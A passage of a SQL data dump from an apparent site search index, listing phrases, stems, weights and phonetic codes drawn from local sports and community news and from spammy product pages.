they',0,1,1.4333,'T143',1,'en'),(49124,'the concern','the concern',0,1,1.3667,'T25265',1,'en'),(49125,'the concern share','the concern share',0,1,1.5667,'T2526526',1,'en'),(49126,'the goal','the goal',0,1,1.2667,'T240',1,'en'),(49127,'the goal by','the goal by',0,1,1.3667,'T241',1,'en'),(49128,'the hard','the hard',0,1,1.2667,'T630',1,'en'),(49129,'the hard way','the hard way',0,1,1.4,'T630',1,'en'),(49130,'the help production','the help production',0,1,1.6333,'T4163235',1,'en'),(49131,'the lehigh','the lehigh',0,1,1.3333,'T420',1,'en'),(49132,'the lehigh local','the lehigh local',0,1,1.5333,'T42424',1,'en'),(49133,'the mennonite','the mennonite',0,1,1.4333,'T530',1,'en'),(49134,'the mennonite and','the mennonite and',0,1,1.5667,'T5353',1,'en'),(49135,'the middle','the middle',0,1,1.3333,'T534',2,'en'),(49136,'the middle and','the middle and',0,1,1.4667,'T53453',1,'en'),(49137,'the morning','the morning',0,1,1.3667,'T5652',1,'en'),(49138,'the morning cal','the morning cal',0,1,1.5,'T56524',1,'en'),(49139,'the morning call','the morning call',0,1,1.5333,'T56524',1,'en'),(49140,'the panther','the panther',0,1,1.3667,'T1536',1,'en'),(49141,'the panther defense','the panther defense',0,1,1.6333,'T15363152',1,'en'),(49142,'the panthers','the panthers',0,1,1.4,'T15362',1,'en'),(49143,'the panthers aren\'t','the panthers aren',0,1,1.6333,'T15362653',1,'en'),(49144,'the panthers looked','the panthers looked',0,1,1.6333,'T15362423',1,'en'),(49145,'the poorest','the poorest',0,1,1.3667,'T1623',1,'en'),(49146,'the poorest people','the poorest people',0,1,1.6,'T162314',1,'en'),(49147,'the preseason','the preseason',0,1,1.4333,'T1625',1,'en'),(49148,'the preseason an','the preseason an',0,1,1.5333,'T1625',1,'en'),(49149,'the rams','the rams',0,1,1.2667,'T652',1,'en'),(49150,'the rams ran','the rams ran',0,1,1.4,'T65265',1,'en'),(49151,'the second','the second',0,1,1.3333,'T253',1,'en'),(49152,'the second overtime','the second overtime',0,1,1.6333,'T2531635',1,'en'),(49153,'the souderton','the souderton',0,1,1.4333,'T23635',1,'en'),(49154,'the souderton area','the souderton area',0,1,1.6,'T236356',1,'en'),(49155,'the starter','the starter',0,1,1.3667,'T23636',1,'en'),(49156,'the starter until','the starter until',0,1,1.5667,'T23636534',1,'en'),(49157,'the suburban','the suburban',0,1,1.4,'T21615',1,'en'),(49158,'the suburban one','the suburban one',0,1,1.5333,'T21615',1,'en'),(49159,'the uprights','the uprights',0,1,1.4,'T16232',1,'en'),(49160,'the uprights after','the uprights after',0,1,1.6,'T16232136',1,'en'),(49161,'the western','the western',0,1,1.3667,'T2365',1,'en'),(49162,'the western hemisphere','the western hemisphere',0,1,1.7333,'T2365216',1,'en'),(49163,'there would','there would',0,1,1.3667,'T643',1,'en'),(49164,'there would be','there would be',0,1,1.4667,'T6431',1,'en'),(49165,'they just','thei just',0,1,1.3,'T230',1,'en'),(49166,'they just wasn\'t','thei just wasn',0,1,1.5333,'T23253',1,'en'),(49167,'those three','those three',0,1,1.3667,'T236',1,'en'),(49168,'those three guys','those three guys',0,1,1.5333,'T2362',1,'en'),(49169,'three guys','three guys',0,1,1.3333,'T620',1,'en'),(49170,'three guys morgans','three guys morgans',0,1,1.6,'T6256252',1,'en'),(49171,'thrift','thrift',0,0,0.4,'T613',1,'en'),(49172,'thrift shop','thrift shop',0,1,1.3667,'T61321',1,'en'),(49173,'thrift shop subscribers','thrift shop subscribers',0,1,1.7667,'T613212126162',1,'en'),(49174,'thrift shoppes','thrift shoppes',0,1,1.4667,'T613212',1,'en'),(49175,'thrift shoppes matching','thrift shoppes matching',0,1,1.7667,'T61321253252',1,'en'),(49176,'title souderton','titl souderton',0,1,1.5,'T423635',1,'en'),(49177,'title souderton thrift','titl souderton thrift',0,1,1.7333,'T4236353613',1,'en'),(49178,'to 63','to 63',0,1,1.1667,'T000',1,'en'),(49179,'to 63 61','to 63 61',0,1,1.2667,'T000',1,'en'),(49180,'to close','to close',0,1,1.2667,'T242',1,'en'),(49181,'to close a','to close a',0,1,1.3333,'T242',1,'en'),(49182,'to mennonite','to mennonite',0,1,1.4,'T530',1,'en'),(49183,'to mennonite central','to mennonite central',0,1,1.6667,'T5325364',1,'en'),(49184,'to shave','to shave',0,1,1.2667,'T210',1,'en'),(49185,'to shave almost','to shave almost',0,1,1.5,'T214523',1,'en'),(49186,'to talk','to talk',0,1,1.2333,'T420',1,'en'),(49187,'to talk to','to talk to',0,1,1.3333,'T423',1,'en'),(49188,'to the morning','to the morning',0,1,1.4667,'T5652',1,'en'),(49189,'to those','to those',0,1,1.2667,'T200',1,'en'),(49190,'to those three','to those three',0,1,1.4667,'T236',1,'en'),(49191,'tom','tom',0,0,0.2,'T500',1,'en'),(49192,'tom housenick','tom housenick',0,1,1.4333,'T5252',1,'en'),(49193,'tom housenick march','tom housenick march',0,1,1.6333,'T5252562',1,'en'),(49194,'took be','took be',0,1,1.2333,'T210',1,'en'),(49195,'took be significant','took be significant',0,1,1.6333,'T21251253',1,'en'),(49196,'total of 20','total of 20',0,1,1.3667,'T410',1,'en'),(49197,'touchdowns','touchdown',0,0,0.6667,'T2352',1,'en'),(49198,'touchdowns in','touchdown in',0,1,1.4333,'T23525',1,'en'),(49199,'touchdowns in rallying','touchdown in rallying',0,1,1.7333,'T235256452',1,'en'),(49200,'track would','track would',0,1,1.3667,'T6243',1,'en'),(49201,'track would end','track would end',0,1,1.5,'T624353',1,'en'),(49202,'tries','tri',0,0,0.3333,'T620',1,'en'),(49203,'tries to','tri to',0,1,1.2667,'T623',1,'en'),(49204,'tries to shave','tri to shave',0,1,1.4667,'T62321',1,'en'),(49205,'triumph not','triumph not',0,1,1.3667,'T65153',1,'en'),(49206,'triumph not for','triumph not for',0,1,1.5,'T6515316',1,'en'),(49207,'tv a','tv a',0,1,1.1333,'T100',1,'en'),(49208,'tv a 17','tv a 17',0,1,1.2333,'T100',1,'en'),(49209,'two months','two months',0,1,1.3333,'T532',1,'en'),(49210,'two months ago','two months ago',0,1,1.4667,'T532',1,'en'),(49211,'two vehicle','two vehicle',0,1,1.3667,'T124',1,'en'),(49212,'two vehicle crash','two vehicle crash',0,1,1.5667,'T124262',1,'en'),(49213,'until in','until in',0,1,1.2667,'U5345',1,'en'),(49214,'until in a','until in a',0,1,1.3333,'U5345',1,'en'),(49215,'uprights','upright',0,0,0.5333,'U16232',1,'en'),(49216,'uprights after','upright after',0,1,1.4667,'U16232136',1,'en'),(49217,'uprights after the','upright after the',0,1,1.6,'U162321363',1,'en'),(49218,'varsity','varsiti',0,0,0.4667,'V623',1,'en'),(49219,'varsity teams','varsiti teams',0,1,1.4333,'V62352',1,'en'),(49220,'varsity teams adding','varsiti teams adding',0,1,1.6667,'V62352352',1,'en'),(49221,'vehicle crash','vehicl crash',0,1,1.4333,'V24262',1,'en'),(49222,'vehicle crash two','vehicl crash two',0,1,1.5667,'V242623',1,'en'),(49223,'victory','victori',0,0,0.4667,'V236',1,'en'),(49224,'victory over','victori over',0,1,1.4,'V23616',1,'en'),(49225,'victory over the','victori over the',0,1,1.5333,'V236163',1,'en'),(49226,'was met','wa met',0,1,1.2333,'W253',1,'en'),(49227,'was met by','wa met by',0,1,1.3333,'W2531',1,'en'),(49228,'wasn\'t and','wasn and',0,1,1.3333,'W25353',1,'en'),(49229,'wasn\'t and when','wasn and when',0,1,1.5,'W253535',1,'en'),(49230,'watching','watch',0,0,0.5333,'W3252',1,'en'),(49231,'watching tv','watch tv',0,1,1.3667,'W325231',1,'en'),(49232,'watching tv a','watch tv a',0,1,1.4333,'W325231',1,'en'),(49233,'way quakertown','wai quakertown',0,1,1.4667,'W2635',1,'en'),(49234,'way quakertown high\'s','wai quakertown high',0,1,1.7,'W26352',1,'en'),(49235,'way within','wai within',0,1,1.3333,'W350',1,'en'),(49236,'way within the','wai within the',0,1,1.4667,'W353',1,'en'),(49237,'well and','well and',0,1,1.2667,'W453',1,'en'),(49238,'well and there','well and there',0,1,1.4667,'W4536',1,'en'),(49239,'western','western',0,0,0.4667,'W2365',1,'en'),(49240,'western hemisphere','western hemisphere',0,1,1.6,'W2365216',1,'en'),(49241,'western hemisphere for','western hemisphere for',0,1,1.7333,'W236521616',1,'en'),(49242,'when nick','when nick',0,1,1.3,'W520',1,'en'),(49243,'when nick soriano\'s','when nick soriano',0,1,1.6333,'W52652',1,'en'),(49244,'when the panthers','when the panthers',0,1,1.5667,'W5315362',1,'en'),(49245,'which after','which after',0,1,1.3667,'W2136',1,'en'),(49246,'which after watching','which after watching',0,1,1.6667,'W21363252',1,'en'),(49247,'will be submitted','will be submitted',0,1,1.5667,'W412153',1,'en'),(49248,'will not publicly','will not publicly',0,1,1.5667,'W4531424',1,'en'),(49249,'win the suburban','win the suburban',0,1,1.5333,'W5321615',1,'en'),(49250,'winning the','win the',0,1,1.3667,'W523',1,'en'),(49251,'winning the hard','win the hard',0,1,1.5333,'W52363',1,'en'),(49252,'winter','winter',0,0,0.4,'W536',1,'en'),(49253,'winter track','winter track',0,1,1.4,'W536362',1,'en'),(49254,'winter track would','winter track would',0,1,1.6,'W53636243',1,'en'),(49255,'within the uprights','within the uprights',0,1,1.6333,'W35316232',1,'en'),(49256,'working beside','work beside',0,1,1.4667,'W6252123',1,'en'),(49257,'working beside the','work beside the',0,1,1.6,'W6252123',1,'en'),(49258,'would be all','would be all',0,1,1.4,'W4314',1,'en'),(49259,'would be coaching','would be coaching',0,1,1.5667,'W431252',1,'en'),(49260,'would end','would end',0,1,1.3,'W4353',1,'en'),(49261,'would end as','would end as',0,1,1.4,'W43532',1,'en'),(49262,'would go just','would go just',0,1,1.4333,'W4323',1,'en'),(49263,'wrestling','wrestl',0,0,0.6,'W623452',1,'en'),(49264,'wrestling freshmen','wrestl freshmen',0,1,1.6,'W6234521625',1,'en'),(49265,'wrestling freshmen teams','wrestl freshmen teams',0,1,1.8,'W6234521625352',1,'en'),(49266,'written','written',0,0,0.4667,'W635',1,'en'),(49267,'written content','written content',0,1,1.5,'W63525353',1,'en'),(49268,'written content by','written content by',0,1,1.6,'W635253531',1,'en'),(49269,'written expertly','written expertly',0,1,1.5333,'W63521634',1,'en'),(49270,'written expertly written','written expertly written',0,1,1.8,'W63521634635',1,'en'),(49271,'yard','yard',0,0,0.2667,'Y630',1,'en'),(49272,'yard field','yard field',0,1,1.3333,'Y63143',1,'en'),(49273,'yard field goal','yard field goal',0,1,1.5,'Y6314324',1,'en'),(49274,'years mcc','year mcc',0,1,1.3,'Y6252',1,'en'),(49275,'years mcc is','year mcc is',0,1,1.4,'Y6252',1,'en'),(49276,'yr','yr',0,0,0.1333,'Y600',1,'en'),(49277,'yr old','yr old',0,1,1.2,'Y643',1,'en'),(49278,'yr old new','yr old new',0,1,1.3333,'Y6435',1,'en'),(49279,'zambelli','zambelli',0,0,0.5333,'Z514',1,'en'),(49280,'zambelli and','zambelli and',0,1,1.4,'Z51453',1,'en'),(49281,'zambelli and sophomores','zambelli and sophomores',0,1,1.7667,'Z5145321562',1,'en'),(49337,'32','32',0,0,0.2,'',1,'en'),(50353,'mid','mid',0,0,0.2,'M300',1,'en'),(50500,'pants','pant',0,0,0.3333,'P532',1,'en'),(50524,'polo a','polo a',0,1,1.2,'P400',1,'en'),(51074,'','',0,0,0,'',1,'en'),(51075,'01','01',0,0,0.2,'',1,'en'),(51076,'01 for','01 for',0,1,1.2,'F600',1,'en'),(51077,'01 for the','01 for the',0,1,1.3333,'F630',1,'en'),(51078,'02','02',0,0,0.2,'',1,'en'),(51079,'02 02','02 02',0,1,1.1667,'',1,'en'),(51080,'02 02 for','02 02 for',0,1,1.3,'F600',1,'en'),(51081,'02 for','02 for',0,1,1.2,'F600',1,'en'),(51082,'02 for the','02 for the',0,1,1.3333,'F630',1,'en'),(51083,'04','04',0,0,0.2,'',1,'en'),(51084,'04 01','04 01',0,1,1.1667,'',1,'en'),(51085,'04 01 for','04 01 for',0,1,1.3,'F600',1,'en'),(51086,'04 02','04 02',0,1,1.1667,'',1,'en'),(51087,'04 02 for','04 02 for',0,1,1.3,'F600',1,'en'),(51088,'1 particle','1 particle',0,1,1.3333,'P6324',1,'en'),(51089,'1 particle ralph','1 particle ralph',0,1,1.5333,'P6324641',1,'en'),(51090,'10 cheap','10 cheap',0,1,1.2667,'C100',1,'en'),(51091,'10 cheap polo','10 cheap polo',0,1,1.4333,'C140',1,'en'),(51092,'10 hold','10 hold',0,1,1.2333,'H430',1,'en'),(51093,'10 hold down','10 hold down',0,1,1.4,'H435',1,'en'),(51094,'10 x','10 x',0,1,1.1333,'X000',1,'en'),(51095,'10 x ralph','10 x ralph',0,1,1.3333,'X641',1,'en'),(51096,'2 bed','2 bed',0,1,1.1667,'B300',1,'en'),(51097,'2 bed polo','2 bed polo',0,1,1.3333,'B314',1,'en'),(51098,'250','250',0,0,0.3,'',1,'en'),(51099,'250 cheap','250 cheap',0,1,1.3,'C100',1,'en'),(51100,'250 cheap polo','250 cheap polo',0,1,1.4667,'C140',1,'en'),(51101,'250 lbs','250 lbs',0,1,1.2333,'L120',1,'en'),(51102,'250 lbs by','250 lbs by',0,1,1.3333,'L121',1,'en'),(51103,'250 pounds','250 pounds',0,1,1.3333,'P532',1,'en'),(51104,'250 pounds per','250 pounds per',0,1,1.4667,'P53216',1,'en'),(51105,'3 32','3 32',0,1,1.1333,'',1,'en'),(51106,'3 32 cheap','3 32 cheap',0,1,1.3333,'C100',1,'en'),(51107,'3 32 screen','3 32 screen',0,1,1.3667,'S650',1,'en'),(51108,'3 disintegrator','3 disintegrator',0,1,1.5,'D2532636',1,'en'),(51109,'3 disintegrator capacity','3 disintegrator capacity',0,1,1.8,'D25326362123',1,'en'),(51110,'3 disintegrator has','3 disintegrator has',0,1,1.6333,'D25326362',1,'en'),(51111,'3 disintegrator is','3 disintegrator is',0,1,1.6,'D25326362',1,'en'),(51112,'3 disintegrator on','3 disintegrator on',0,1,1.6,'D25326365',1,'en'),(51113,'3 windmill','3 windmill',0,1,1.3333,'W5354',1,'en'),(51114,'3 windmill 2','3 windmill 2',0,1,1.4,'W5354',1,'en'),(51115,'32 cheap','32 cheap',0,1,1.2667,'C100',1,'en'),(51116,'32 cheap ralph','32 cheap ralph',0,1,1.4667,'C1641',1,'en'),(51117,'32 screen','32 screen',0,1,1.3,'S650',1,'en'),(51118,'32 screen is','32 screen is',0,1,1.4,'S652',1,'en'),(51119,'40 cheap','40 cheap',0,1,1.2667,'C100',1,'en'),(51120,'40 cheap mens','40 cheap mens',0,1,1.4333,'C152',1,'en'),(51121,'5 8','5 8',0,1,1.1,'',1,'en'),(51122,'5 8 thick','5 8 thick',0,1,1.3,'T200',1,'en'),(51123,'5 ralph','5 ralph',0,1,1.2333,'R410',1,'en'),(51124,'5 ralph lauren','5 ralph lauren',0,1,1.4667,'R41465',1,'en'),(51125,'550','550',0,0,0.3,'',1,'en'),(51126,'550 pounds','550 pounds',0,1,1.3333,'P532',1,'en'),(51127,'550 pounds ralph','550 pounds ralph',0,1,1.5333,'P532641',1,'en'),(51128,'6 the','6 the',0,1,1.1667,'T000',1,'en'),(51129,'6 the exact','6 the exact',0,1,1.3667,'T230',1,'en'),(51130,'600 lbs','600 lbs',0,1,1.2333,'L120',1,'en'),(51131,'600 lbs hr','600 lbs hr',0,1,1.3333,'L126',1,'en'),(51132,'600 lbs with','600 lbs with',0,1,1.4,'L123',1,'en'),(51133,'7 w','7 w',0,1,1.1,'W000',1,'en'),(51134,'7 w x','7 w x',0,1,1.1667,'W200',1,'en'),(51135,'8 thick','8 thick',0,1,1.2333,'T200',1,'en'),(51136,'8 thick chef','8 thick chef',0,1,1.4,'T210',1,'en'),(51137,'a amount','a amount',0,1,1.2667,'A530',1,'en'),(51138,'a amount media','a amount media',0,1,1.4667,'A5353',1,'en'),(51139,'a cheap','a cheap',0,1,1.2333,'A210',1,'en'),(51140,'a cheap ralph','a cheap ralph',0,1,1.4333,'A21641',1,'en'),(51141,'a genuine','a genuine',0,1,1.3,'A250',1,'en'),(51142,'a genuine light','a genuine light',0,1,1.5,'A25423',1,'en'),(51143,'a single bag','a single bag',0,1,1.4,'A252412',1,'en'),(51144,'accessorie','accessori',0,0,0.6667,'A260',1,'en'),(51145,'accessorie by','accessori by',0,1,1.4333,'A261',1,'en'),(51146,'accessorie by nsa','accessori by nsa',0,1,1.5667,'A26152',1,'en'),(51147,'adequate waste','adequ waste',0,1,1.4667,'A32323',1,'en'),(51148,'adequate waste sizing','adequ waste sizing',0,1,1.7,'A32323252',1,'en'),(51149,'air evacuation','air evacuation',0,1,1.4667,'A61235',1,'en'),(51150,'air evacuation waste','air evacuation waste',0,1,1.6667,'A6123523',1,'en'),(51151,'all sem','all sem',0,1,1.2333,'A425',1,'en'),(51152,'all sem disintegrators','all sem disintegrators',0,1,1.7333,'A425325326362',1,'en'),(51153,'along with a','along with a',0,1,1.4,'A4523',1,'en'),(51154,'amount media','amount media',0,1,1.4,'A5353',1,'en'),(51155,'amount media polo','amount media polo',0,1,1.5667,'A535314',1,'en'),(51156,'an overabundance','an overabundance',0,1,1.5333,'A51615352',1,'en'),(51157,'an overabundance units','an overabundance units',0,1,1.7333,'A51615352532',1,'en'),(51158,'and 10','and 10',0,1,1.2,'A530',1,'en'),(51159,'and 10 hold','and 10 hold',0,1,1.3667,'A5343',1,'en'),(51160,'and girls','and girls',0,1,1.3,'A532642',1,'en'),(51161,'and girls ralph','and girls ralph',0,1,1.5,'A532642641',1,'en'),(51162,'and larger','and larger',0,1,1.3333,'A534626',1,'en'),(51163,'and larger volumes','and larger volumes',0,1,1.6,'A5346261452',1,'en'),(51164,'and minimal','and minimal',0,1,1.3667,'A5354',1,'en'),(51165,'and minimal mens','and minimal mens',0,1,1.5333,'A535452',1,'en'),(51166,'and up','and up',0,1,1.2,'A531',1,'en'),(51167,'and up to','and up to',0,1,1.3,'A5313',1,'en'),(51168,'any type','ani type',0,1,1.2667,'A531',2,'en'),(51169,'any type of','ani type of',0,1,1.3667,'A531',2,'en'),(51170,'appropriate ralph','appropri ralph',0,1,1.5667,'A16163641',1,'en'),(51171,'appropriate ralph lauren','appropri ralph lauren',0,1,1.8,'A16163641465',1,'en'),(51172,'approved 250','approv 250',0,1,1.4,'A1613',1,'en'),(51173,'approved 250 lbs','approv 250 lbs',0,1,1.5333,'A1613412',1,'en'),(51174,'at 250','at 250',0,1,1.2,'A300',1,'en'),(51175,'at 250 pounds','at 250 pounds',0,1,1.4333,'A31532',1,'en'),(51176,'at 3','at 3',0,1,1.1333,'A300',1,'en'),(51177,'at 3 32','at 3 32',0,1,1.2333,'A300',1,'en'),(51178,'at cheap','at cheap',0,1,1.2667,'A321',1,'en'),(51179,'at cheap ralph','at cheap ralph',0,1,1.4667,'A321641',1,'en'),(51180,'at nsa','at nsa',0,1,1.2,'A352',1,'en'),(51181,'at nsa authorized','at nsa authorized',0,1,1.5667,'A3523623',1,'en'),(51182,'at wholesale','at wholesale',0,1,1.4,'A3424',1,'en'),(51183,'at wholesale prices','at wholesale prices',0,1,1.6333,'A3424162',1,'en'),(51184,'authorized','author',0,0,0.6667,'A3623',1,'en'),(51185,'authorized levels','author levels',0,1,1.5667,'A36234142',1,'en'),(51186,'authorized levels and','author levels and',0,1,1.7,'A3623414253',1,'en'),(51187,'bag air','bag air',0,1,1.2333,'B260',1,'en'),(51188,'bag air evacuation','bag air evacuation',0,1,1.6,'B261235',1,'en'),(51189,'bags for reasonable','bag for reasonable',0,1,1.6333,'B2162514',1,'en'),(51190,'bed','bed',0,0,0.2,'B300',1,'en'),(51191,'bed polo','bed polo',0,1,1.2667,'B314',1,'en'),(51192,'bed polo ralph','bed polo ralph',0,1,1.4667,'B314641',1,'en'),(51193,'been evaluated','been evaluated',0,1,1.4667,'B5143',1,'en'),(51194,'been evaluated cheap','been evaluated cheap',0,1,1.6667,'B514321',1,'en'),(51195,'blade','blade',0,0,0.3333,'B430',1,'en'),(51196,'blade cutting','blade cutting',0,1,1.4333,'B432352',1,'en'),(51197,'blade cutting system','blade cutting system',0,1,1.6667,'B43235235',1,'en'),(51198,'bolts','bolt',0,0,0.3333,'B432',1,'en'),(51199,'bolts per','bolt per',0,1,1.3,'B43216',1,'en'),(51200,'bolts per silverware','bolt per silverware',0,1,1.6667,'B432162416',1,'en'),(51201,'book','book',0,0,0.2667,'B200',1,'en'),(51202,'book display','book display',0,1,1.4,'B23214',1,'en'),(51203,'book display units','book display units',0,1,1.6,'B23214532',1,'en'),(51204,'boys exploitation','boi exploitation',0,1,1.5667,'B21435',1,'en'),(51205,'boys exploitation of','boi exploitation of',0,1,1.6667,'B214351',1,'en'),(51206,'boys solid','boi solid',0,1,1.3333,'B243',1,'en'),(51207,'boys solid steel','boi solid steel',0,1,1.5333,'B243234',1,'en'),(51208,'bulk','bulk',0,0,0.2667,'B420',1,'en'),(51209,'bulk material','bulk material',0,1,1.4333,'B425364',1,'en'),(51210,'bulk material when','bulk material when',0,1,1.6,'B4253645',1,'en'),(51211,'by hr','by hr',0,1,1.1667,'B600',1,'en'),(51212,'by hr trimming','by hr trimming',0,1,1.4667,'B63652',1,'en'),(51213,'by nsa','by nsa',0,1,1.2,'B520',1,'en'),(51214,'by nsa mens','by nsa mens',0,1,1.3667,'B5252',1,'en'),(51215,'by the extensive','by the extensive',0,1,1.5333,'B323521',1,'en'),(51216,'capacity','capac',0,0,0.5333,'C123',1,'en'),(51217,'capacity at','capac at',0,1,1.3667,'C123',1,'en'),(51218,'capacity at cheap','capac at cheap',0,1,1.5667,'C12321',1,'en'),(51219,'chamber','chamber',0,0,0.4667,'C516',1,'en'),(51220,'chamber ralph','chamber ralph',0,1,1.4333,'C51641',1,'en'),(51221,'chamber ralph lauren','chamber ralph lauren',0,1,1.6667,'C51641465',1,'en'),(51222,'cheap mens','cheap mens',0,1,1.3333,'C152',1,'en'),(51223,'cheap mens ralph','cheap mens ralph',0,1,1.5333,'C152641',1,'en'),(51224,'chef','chef',0,0,0.2667,'C100',1,'en'),(51225,'chef cutlery','chef cutlery',0,1,1.4,'C12346',1,'en'),(51226,'chef cutlery and','chef cutlery and',0,1,1.5333,'C1234653',1,'en'),(51227,'classic fit polo','classic fit polo',0,1,1.5333,'C421314',1,'en'),(51228,'classified ralph','classifi ralph',0,1,1.5333,'C4213641',1,'en'),(51229,'classified ralph lauren','classifi ralph lauren',0,1,1.7667,'C4213641465',1,'en'),(51230,'coined','coin',0,0,0.4,'C530',1,'en'),(51231,'coined organizations','coin organizations',0,1,1.6667,'C536252352',1,'en'),(51232,'coined organizations disintegrator','coin organizations disintegrator',0,1,2,'C53625235232532636',1,'en'),(51233,'company search','compani search',0,1,1.4667,'C515262',1,'en'),(51234,'company search engine','compani search engine',0,1,1.7,'C515262525',1,'en'),(51235,'computer monitor','comput monitor',0,1,1.5333,'C5136536',1,'en'),(51236,'computer monitor all','comput monitor all',0,1,1.6667,'C51365364',1,'en'),(51237,'css','css',0,0,0.2,'C000',1,'en'),(51238,'css 02','css 02',0,1,1.2,'C000',1,'en'),(51239,'css 02 02','css 02 02',0,1,1.3,'C000',1,'en'),(51240,'css 04','css 04',0,1,1.2,'C000',1,'en'),(51241,'css 04 01','css 04 01',0,1,1.3,'C000',1,'en'),(51242,'css ralph','css ralph',0,1,1.3,'C641',1,'en'),(51243,'css ralph lauren','css ralph lauren',0,1,1.5333,'C641465',1,'en'),(51244,'custom fit','custom fit',0,1,1.3333,'C3513',1,'en'),(51245,'custom fit store','custom fit store',0,1,1.5333,'C3513236',1,'en'),(51246,'cutlery','cutleri',0,0,0.4667,'C346',1,'en'),(51247,'cutlery and','cutleri and',0,1,1.3667,'C34653',1,'en'),(51248,'cutlery and 10','cutleri and 10',0,1,1.4667,'C34653',1,'en'),(51249,'cutting','cut',0,0,0.4667,'C352',1,'en'),(51250,'cutting chamber','cut chamber',0,1,1.5,'C352516',1,'en'),(51251,'cutting chamber ralph','cut chamber ralph',0,1,1.7,'C35251641',1,'en'),(51252,'cutting power','cut power',0,1,1.4333,'C35216',1,'en'),(51253,'cutting power to','cut power to',0,1,1.5333,'C352163',1,'en'),(51254,'cutting system','cut system',0,1,1.4667,'C35235',1,'en'),(51255,'cutting system 3','cut system 3',0,1,1.5333,'C35235',1,'en'),(51256,'cutting system with','cut system with',0,1,1.6333,'C352353',1,'en'),(51257,'d x','d x',0,1,1.1,'D200',1,'en'),(51258,'d x 7','d x 7',0,1,1.1667,'D200',1,'en'),(51259,'denser','denser',0,0,0.4,'D526',1,'en'),(51260,'denser and','denser and',0,1,1.3333,'D52653',1,'en'),(51261,'denser and larger','denser and larger',0,1,1.5667,'D526534626',1,'en'),(51262,'deploy','deploi',0,0,0.4,'D140',1,'en'),(51263,'deploy solid','deploi solid',0,1,1.4,'D14243',1,'en'),(51264,'deploy solid steel','deploi solid steel',0,1,1.6,'D14243234',1,'en'),(51265,'design generates','design generates',0,1,1.5333,'D2525632',1,'en'),(51266,'design generates ralph','design generates ralph',0,1,1.7333,'D2525632641',1,'en'),(51267,'destroy','destroi',0,0,0.4667,'D236',1,'en'),(51268,'destroy any','destroi any',0,1,1.3667,'D2365',1,'en'),(51269,'destroy any type','destroi any type',0,1,1.5333,'D236531',1,'en'),(51270,'destruction well','destruct well',0,1,1.5333,'D2362354',1,'en'),(51271,'destruction well over','destruct well over',0,1,1.7,'D236235416',1,'en'),(51272,'deterioration','deterior',0,0,0.8667,'D635',1,'en'),(51273,'deterioration of','deterior of',0,1,1.5333,'D6351',1,'en'),(51274,'deterioration of boys','deterior of boys',0,1,1.7,'D63512',1,'en'),(51275,'devastation','devast',0,0,0.7333,'D1235',1,'en'),(51276,'devastation of','devast of',0,1,1.4667,'D12351',1,'en'),(51277,'devastation of paper','devast of paper',0,1,1.6667,'D123516',1,'en'),(51278,'disintegrator','disintegr',0,0,0.8667,'D2532636',1,'en'),(51279,'disintegrator capacity','disintegr capacity',0,1,1.7333,'D25326362123',1,'en'),(51280,'disintegrator capacity at','disintegr capacity at',0,1,1.8333,'D25326362123',1,'en'),(51281,'disintegrator has','disintegr has',0,1,1.5667,'D25326362',1,'en'),(51282,'disintegrator has polo','disintegr has polo',0,1,1.7333,'D2532636214',1,'en'),(51283,'disintegrator is','disintegr is',0,1,1.5333,'D25326362',1,'en'),(51284,'disintegrator is polo','disintegr is polo',0,1,1.7,'D2532636214',1,'en'),(51285,'disintegrator on','disintegr on',0,1,1.5333,'D25326365',1,'en'),(51286,'disintegrator on book','disintegr on book',0,1,1.7,'D2532636512',1,'en'),(51287,'disintegrator over','disintegr over',0,1,1.6,'D253263616',1,'en'),(51288,'disintegrator over 40','disintegr over 40',0,1,1.7,'D253263616',1,'en'),(51289,'disintegrator rendering','disintegr rendering',0,1,1.7667,'D253263653652',1,'en'),(51290,'disintegrator rendering ralph','disintegr rendering ralph',0,1,1.9667,'D253263653652641',1,'en'),(51291,'disintegrators','disintegr',0,0,0.9333,'D25326362',1,'en'),(51292,'disintegrators meet','disintegr meet',0,1,1.6333,'D2532636253',1,'en'),(51293,'disintegrators meet ralph','disintegr meet ralph',0,1,1.8333,'D2532636253641',1,'en'),(51294,'disintegrators use','disintegr use',0,1,1.6,'D25326362',1,'en'),(51295,'disintegrators use proven','disintegr use proven',0,1,1.8333,'D253263621615',1,'en'),(51296,'display units','displai units',0,1,1.4333,'D214532',1,'en'),(51297,'display units now','displai units now',0,1,1.5667,'D2145325',1,'en'),(51298,'down bolts','down bolts',0,1,1.3333,'D51432',1,'en'),(51299,'down bolts per','down bolts per',0,1,1.4667,'D5143216',1,'en'),(51300,'dress shirts at','dress shirts at',0,1,1.5,'D626323',1,'en'),(51301,'dress shirts outlet','dress shirts outlet',0,1,1.6333,'D62632343',1,'en'),(51302,'dresses web','dress web',0,1,1.3667,'D621',1,'en'),(51303,'dresses web feed','dress web feed',0,1,1.5333,'D6213',1,'en'),(51304,'duty disintegrator','duti disintegrator',0,1,1.6,'D2532636',1,'en'),(51305,'duty disintegrator rendering','duti disintegrator rendering',0,1,1.9333,'D253263653652',1,'en'),(51306,'engine marketing','engin marketing',0,1,1.5333,'E52562352',1,'en'),(51307,'engine marketing disintegrators','engin marketing disintegrators',0,1,2,'E52562352325326362',1,'en'),(51308,'engine optimization','engin optimization',0,1,1.6333,'E525135235',1,'en'),(51309,'engine optimization disintegrators','engin optimization disintegrators',0,1,2,'E525135235325326362',1,'en'),(51310,'equiptment','equipt',0,0,0.6667,'E21353',1,'en'),(51311,'equiptment large','equipt large',0,1,1.5333,'E21353462',1,'en'),(51312,'equiptment large ralph','equipt large ralph',0,1,1.7333,'E21353462641',1,'en'),(51313,'evacuation','evacu',0,0,0.6667,'E1235',1,'en'),(51314,'evacuation waste','evacu waste',0,1,1.5333,'E123523',1,'en'),(51315,'evacuation waste specify','evacu waste specify',0,1,1.8,'E1235232121',1,'en'),(51316,'evaluated','evalu',0,0,0.6,'E143',1,'en'),(51317,'evaluated cheap','evalu cheap',0,1,1.5,'E14321',1,'en'),(51318,'evaluated cheap polo','evalu cheap polo',0,1,1.6667,'E143214',1,'en'),(51319,'exact sem','exact sem',0,1,1.3,'E2325',1,'en'),(51320,'exact sem 3','exact sem 3',0,1,1.3667,'E2325',1,'en'),(51321,'exploitation','exploit',0,0,0.8,'E21435',1,'en'),(51322,'exploitation of','exploit of',0,1,1.5,'E214351',1,'en'),(51323,'exploitation of eye','exploit of eye',0,1,1.6333,'E214351',1,'en'),(51324,'extensive','extens',0,0,0.6,'E23521',1,'en'),(51325,'extensive mens','extens mens',0,1,1.4667,'E2352152',1,'en'),(51326,'extensive mens ralph','extens mens ralph',0,1,1.6667,'E2352152641',1,'en'),(51327,'eye media','ey 